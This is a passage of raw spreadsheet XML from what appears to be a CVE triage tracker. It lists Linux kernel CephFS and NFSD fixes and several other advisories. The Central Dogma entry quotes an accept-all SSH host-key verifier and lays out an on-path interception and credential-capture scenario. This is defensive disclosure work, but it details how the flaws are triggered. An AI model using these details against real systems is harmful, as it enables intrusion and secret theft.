memcpy(value, xattr-&gt;val, xattr-&gt;val_len) into a user-supplied buffer,
copying bytes past the end of the allocation back to user space.
Impact: a malicious metadata server discloses adjacent kernel heap bytes
to a local user via getxattr(2) on a CephFS file. Add the missing
ceph_decode_need() so an out-of-bounds value length on the final
attribute fails the decode and returns -EIO instead of being stored.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89649</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89650</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound num_export_targets array for mds info v2/v3
ceph_mdsmap_decode() in fs/ceph/mdsmap.c reads num_export_targets from
each per-mds info record and advances the decode cursor by
num_export_targets * sizeof(u32) without first checking that many bytes
remain. The only upper-bound check that catches a runaway cursor
(*p &gt; info_end) is gated on info_v &gt;= 4, because info_end is left NULL
for info_v 2 and 3. When the monitor sends an MDS map whose per-mds
info version is 2 or 3 with an oversized num_export_targets, the cursor
moves past the message front buffer and the later export-targets loop
calls the unchecked ceph_decode_32() on out-of-bounds memory.
A kernel client processes CEPH_MSG_MDS_MAP from its monitor session
(net/ceph/mon_client.c dispatches it; fs/ceph/super.c routes it to
ceph_mdsc_handle_mdsmap(), which sets end to the front buffer bound and
calls ceph_mdsmap_decode()). A malicious or compromised monitor, or an
on-path attacker on an unsigned/unencrypted messenger session, can
therefore drive an out-of-bounds read in the client kernel; on x86_64
with KASAN it is reported as a slab-out-of-bounds read in
ceph_mdsmap_decode(). The decoded values land in the internal
info-&gt;export_targets[] array, so the consequence is a kernel
out-of-bounds read, not an information leak to the attacker.
Impact: a malicious or compromised Ceph monitor sending an MDS map with
a per-mds info version of 2 or 3 and an oversized num_export_targets
field triggers an out-of-bounds read in the CephFS client kernel.
Add a ceph_decode_need() for the export-targets array before advancing
the cursor, so the bound is enforced for every info_v &gt;= 2, not only
info_v &gt;= 4. This mirrors the count-then-need idiom already used for
m_data_pg_pools later in the same function.
Compute the export-targets byte count with size_mul() and reuse that
checked length when advancing the cursor, so the attacker-controlled
num_export_targets multiplication fails closed on overflow rather than
relying on the later kcalloc() guard.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89650</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89671</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: gate nfs3 setacl by argp-&gt;mask
nfsd3_proc_setacl() calls set_posix_acl() unconditionally for both
ACL_TYPE_ACCESS and ACL_TYPE_DEFAULT, passing argp-&gt;acl_access and
argp-&gt;acl_default verbatim. The NFSv3 ACL decoder only populates
those pointers when the corresponding mask bit is set:
    nfs3svc_decode_setaclargs()
      if (args-&gt;mask &amp; NFS_ACL)    decode into acl_access
      if (args-&gt;mask &amp; NFS_DFACL)  decode into acl_default
      /* otherwise the pointer stays NULL (pc_argzero) */
    nfsd3_proc_setacl()
      set_posix_acl(.., ACL_TYPE_ACCESS,  argp-&gt;acl_access)
      set_posix_acl(.., ACL_TYPE_DEFAULT, argp-&gt;acl_default)
set_posix_acl(idmap, dentry, type, NULL) is the VFS "remove this
ACL type" operation. A NULL pointer that means "the client did not
send this arm" is therefore indistinguishable from "the client
asked to remove this ACL". A SETACL with mask=NFS_ACL silently
drops the directory's default ACL; mask=0 drops both.
The sibling nfsd3_proc_getacl() already consults argp-&gt;mask before
touching each arm; mirror that in setacl.
Fix by wrapping each set_posix_acl() call in the matching mask bit
check and initializing error to 0 before inode_lock so that a
request with neither bit set leaves the on-disk ACLs untouched and
returns nfs_ok. The out_drop_lock path and the unconditional
posix_acl_release() at out: are preserved; both NULL-tolerate the
skipped arms.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89671</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89672</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: gate nfs2 setacl by argp-&gt;mask
The NFSACL v2 SETACL path shares the decoder convention used by its
v3 sibling: nfsaclsvc_decode_setaclargs() fills in argp-&gt;acl_access
only when NFS_ACL is set in the request mask and argp-&gt;acl_default
only when NFS_DFACL is set, leaving the other pointer NULL because
the argument buffer is zeroed up to pc_argzero before decode.
nfsacld_proc_setacl() then hands both pointers to set_posix_acl()
unconditionally. set_posix_acl(idmap, dentry, type, NULL) is the VFS
"remove this ACL type" operation, so an omitted arm is
indistinguishable from an explicit request to delete that ACL. A
SETACL carrying only NFS_ACL silently strips the directory's default
ACL; mask=0 strips both.
This is the same defect just fixed in nfsd3_proc_setacl(); apply the
same remedy. Gate each set_posix_acl() call on its mask bit and
initialize error to 0 so that a request with neither bit set leaves
the on-disk ACLs untouched and returns success. The out_drop_lock
path and the unconditional posix_acl_release() in
nfsaclsvc_release_setacl() already tolerate the skipped arms.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89672</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89697</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: add fh_want_write() for early-verified SETATTR in nfsd_proc_setattr()
The BOTH_TIME_SET branch calls fh_verify() early so setattr_prepare()
can inspect the dentry. This causes nfsd_setattr() to skip
fh_want_write(), so notify_change() runs without a mount write
reference.
Add the missing fh_want_write() call after the early fh_verify().</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89697</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89713</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: check truncate permission under inode lock
nfsd_setattr() checks whether a size update needs NFSD_MAY_TRUNC
before it takes inode_lock(). The comparison uses the file size sampled
by that unlocked read, but the actual ATTR_SIZE update is applied later
under inode_lock() by notify_change().
This leaves a TOCTOU window for append-only files. If a client sends a
SETATTR that does not shrink the file at the time of the unlocked
sample, a concurrent append can extend the file before nfsd_setattr()
takes inode_lock(). notify_change() then applies a real truncation
without the NFSD_MAY_TRUNC check that rejects IS_APPEND(inode). The VFS
truncate syscall paths perform their own append-only checks before
calling notify_change(), so NFSD must make this decision against the
locked size it is about to change.
Split the write-count acquisition from the truncation permission check.
Keep get_write_access() before the locked setattr work, then recheck
whether the requested size is below i_size_read(inode) after inode_lock()
has been acquired and before notify_change(ATTR_SIZE). This also avoids
the plain unlocked inode-&gt;i_size load.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89713</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11745</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server-mirror-git</t>
        </is>
      </c>
      <c r="M143" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr"/>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-322</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t># Vulnerability
Central Dogma's Git mirror SSH client installs an Apache MINA SSHD `ServerKeyVerifier` lambda that returns `true` unconditionally for every outbound SSH connection used by `git+ssh://` mirrors. The accompanying lines disable the `known_hosts` and `~/.ssh/config` fallbacks, and a repo-wide search confirms that no host-key pinning mechanism (no `acceptedHostKeys`, `knownHosts`, `KnownHostsServerKeyVerifier`, `StaticServerKeyVerifier`, or `RequiredServerKeyVerifier`) exists anywhere in `server-mirror-git/`. Operators have no opt-in way to enable verification. Every outbound mirror connection blindly trusts whatever host key the remote presents.
## Evidence
File: `server-mirror-git/src/main/java/com/linecorp/centraldogma/server/internal/mirror/SshGitMirror.java`
Lines 143-160 (especially 149) on branch `main` @ commit `d64a5151`:
```java
private SshClient createSshClient() {
    final ClientBuilder builder = ClientBuilder.builder();
    // Do not use local file system.
    builder.hostConfigEntryResolver(HostConfigEntryResolver.EMPTY);   // line 146
    builder.fileSystemFactory(NoneFileSystemFactory.INSTANCE);        // line 147
    // Do not verify the server key.
    builder.serverKeyVerifier((clientSession, remoteAddress, serverKey) -&gt; true);  // line 149
    ...
}
```
Verification:
- Read confirmed on 2026-05-21 against `main` @ `d64a5151`.
- A multi-agent code audit verified that no operator-facing pinning field exists on `SshKeyCredential`, `PasswordCredential`, or `MirrorContext`.
- Exploit PoC reproduced locally with a `paramiko`-based fake SSH server bound to 127.0.0.1. The fake server presents an ephemeral RSA host key never seen before; the Central Dogma mirror client accepts the connection and proceeds to authentication, logging the offered username and public-key fingerprint. A correctly hardened SSH client would refuse the connection before reaching the authentication phase.
- Full PoC artifacts (read-only, loopback-only) at `~/centraldogma-poc/C1_ssh_hostkey_bypass/` on the reporter's workstation.
## Impact
Threat model: An on-path attacker on the corporate network — ARP spoofing on the LAN, internal DNS poisoning, malicious internal DNS overriding `github.com` or the configured internal git hostname, BGP hijack, sidecar/CNI compromise in Kubernetes, or any process able to answer TCP on the resolved IP. No Central Dogma account required; only network position.
1. **Direction `LOCAL_TO_REMOTE`**: the attacker impersonating the remote git server receives the entire mirrored repository contents over the SSH session. Central Dogma is a configuration store, so this typically exfiltrates DB credentials, third-party API keys, certificates, feature flags, and any other secret configuration committed to mirrored repositories.
2. **Direction `REMOTE_TO_LOCAL`**: the attacker can serve arbitrary commits which Central Dogma materializes into the local repo and then broadcasts to every subscribing microservice via the watch API. This is a supply-chain root-of-trust compromise across all downstream services consuming Central Dogma configuration.
3. **Credential theft chain with finding H2** (mirror credentials are not bound to a hostname): an SSH key or access token configured for `github.com` can be captured by the attacker's fake server and replayed against the real upstream, extending impact beyond Central Dogma itself.
Scope is `Changed` (CVSS) because exploitation alters trust assumptions of every downstream client of Central Dogma, not just Central Dogma itself.
## How to fix
1. Add an `acceptedHostKeys: List&lt;String&gt;` field to `SshKeyCredential` and `PasswordCredential` (or to `MirrorContext`). Values are SHA-256 fingerprints of trusted remote SSH server host keys, e.g. `SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8`.
2. Replace the accept-all lambda at `SshGitMirror.java:149` with a verifier that computes the SHA-256 fingerprint of the presented host key and compares it against the credential's allowlist using a constant-time comparison.
3. Refuse to connect when `acceptedHostKeys` is empty — fail-closed. Do not implement implicit TOFU.
4. Optionally provide an admin-only `dogma mirror probe-host-key &lt;remote&gt;` tool that performs a single audited connection, prints the server's fingerprint, and prompts the operator to add it to the credential. This makes TOFU an explicit, audited operation.
5. Update `SshGitMirrorTest.java` and `it/mirror/*` tests to pin a test fingerprint or use the explicit trust-once tool, so the regression cannot silently return.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11745</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12894</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Qute template engine, which is used by Quarkus to generate dynamic content like HTML pages or emails. The issue exists in the component responsible for looking up data values (ReflectionValueResolver), which fails to properly block access to sensitive Java internal functions when processing certain data types like Enums. An attacker who can provide or influence the template text can exploit this bypass to take control of the server by executing unauthorized commands.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12894</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21094</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in wpa_supplicant prior to SMR Sep-2026 Release 1 allows adjacent attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21094</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41870</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862, CWE-913, CWE-94</t>
        </is>
      </c>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Control of Generation of Code ('Code Injection'), Improper Control of Dynamically-Managed Code Resources, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Nutch Server  (Nutch REST API).
This issue affects Apache Nutch: from 1.11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S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41870</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62102</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Gato GraphQL &lt;= 19.2.3 versions.</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62102</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62106</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in SMS Alert Order Notifications &lt;= 3.9.9 versions.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62106</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62107</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Masteriyo - LMS &lt;= 3.4.0 versions.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
